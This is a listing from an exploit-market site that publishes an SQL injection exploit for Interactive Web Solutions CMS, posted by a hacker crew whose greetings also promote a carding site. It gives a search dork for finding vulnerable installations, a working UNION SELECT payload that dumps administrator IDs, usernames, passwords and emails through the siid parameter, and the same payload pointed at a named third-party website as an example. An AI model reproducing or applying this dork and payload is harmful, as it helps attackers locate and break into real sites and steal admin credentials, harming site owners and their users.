[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Interactive Web Solutions CMS SQL Injection Vulnerability

Author
Dr.0rYX
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14090
Category
web applications
Date add
16-09-2010
Platform
php
=========================================================
Interactive Web Solutions CMS SQL Injection Vulnerability
=========================================================

 * EDB-ID: 
 * CVE: 
 * OSVDB-ID: 
 * Author: Dr.0rYX and Cr3w-DZ
 * Published: 
 * Verified: 
 * Exploit Code:   
 * Vulnerable App:    

****************************************************************************************************
*           _______       ___________.__                     ___________      .__                  *
*      ____ \   _  \______\__    ___/|  |__           _____  \_   _____/______|__| ____ _____      *
*     /    \/  /_\  \_  __ \|    |   |  |  \   ______ \__  \  |    __) \_  __ \  |/ ___\\__  \     *
*    |   |  \  \_/   \  | \/|    |   |   Y  \ /_____/  / __ \_|     \   |  | \/  \  \___ / __ \_   *
*    |___|  /\_____  /__|   |____|   |___|  /         (____  /\___  /   |__|  |__|\___  >____  /   *
*         \/       \/                     \/               \/     \/                  \/     \/    *
*                                      .__  __             __                                      *
*      ______ ____   ____  __ _________|__|/  |_ ___.__. _/  |_  ____ _____    _____               *
*     /  ___// __ \_/ ___\|  |  \_  __ \  \   __<   |  | \   __\/ __ \\__  \  /     \              *
*     \___ \\  ___/\  \___|  |  /|  | \/  ||  |  \___  |  |  | \  ___/ / __ \|  Y Y  \             *
*    /____  >\___  >\___  >____/ |__|  |__||__|  / ____|  |__|  \___  >____  /__|_|  /             *
*         \/     \/     \/                       \/                 \/     \/      \/              *
*                                                        Pr!v8 Expl0iT AND t00l **                 *                                                                  
*                                      ALGERIAN HACKERS                                            *      
*********************************- NORTH-AFRICA SECURITY TEAM -*************************************
 
[!]            Interactive Web Solutions CMS SQL Injection Vulnerability
[!] Author    : Dr.0rYX and Cr3w-DZ
[!] MAIL      : vx3@hotmail.de<mailto:vx3@hotmail.de>  &  Cr3w@hotmail.de<mailto:Cr3w@hotmail.de>
                WWW.carding-zone.com
***************************************************************************/
 
[ Software Information ]
 
[+] Vendor : http://www.iwswebsolutions.com/
[+] script   : Interactive Web Solutions CMS 
[+] Download :http://www.iwswebsolutions.com/contact_us_interactive_website_solutions.html (sell script )
[+] Vulnerability : remote SQL injection
[+] Dork : inurl:"site_info.php?siid=" Interactive Web Solutions
 
**************************************************************************/
[ Vulnerable File ]
 
http://server/site_info.php?siid=[N.A.S.T ]
 
 
[ Exploit  ]
 
http://server/site_info.php?siid=-4+union+select+1,2,3,4,5,6,7,concat(admin_id,0x3a,admin_username,0x3a,admin_password,0x3a,admin_email),9,10,11+from+tadmin--
 
 
 
[ ExAMPLE ]

http://www.globalmediaconcierge.com/site_info.php?siid=-4+union+select+1,2,3,4,5,6,7,concat(admin_id,0x3a,admin_username,0x3a,admin_password,0x3a,admin_email),9,10,11+from+tadmin--
 
[  GReetz ]
 
[+] :clAw from www.carding-zone.com ,By_aGResiF , MILOR123 , inj3ct0r.com , exploit-db.com , ALL HACKERS MUSLIMS



#  0day.today [2024-12-25]  #